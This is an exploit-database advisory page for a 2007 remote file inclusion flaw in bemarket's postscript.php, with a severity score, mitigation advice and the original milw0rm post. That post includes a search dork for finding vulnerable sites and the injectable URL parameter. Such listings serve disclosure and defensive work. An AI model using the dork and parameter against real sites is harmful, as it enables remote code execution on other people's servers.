header-logo
Suggest Exploit
vendor:
bemarket
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: bemarket
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

bemarket postscript.php Remote File Inclusion Vulnerability

The bemarket postscript.php file is vulnerable to remote file inclusion. An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution.

Mitigation:

Apply a patch or update to a version that fixes the vulnerability. Alternatively, restrict access to the vulnerable file or implement input validation to prevent remote file inclusion.
Source

Exploit-DB raw data:

dork:inurl:bemarket
xpl:/bemarket/postscript/postscript.php?p_mode=
 
original post:http://darkcode.ath.cx/f0rum/ind3x.php?action=vthread&forum=12&topic=80
 
Greetz:d3hydr8,whoami
 
mozi2weed@yahoo.com
magenkyo.sharingan@yahoo.com

# milw0rm.com [2007-07-18]

Navigation

Suggest Exploit

Services By CQR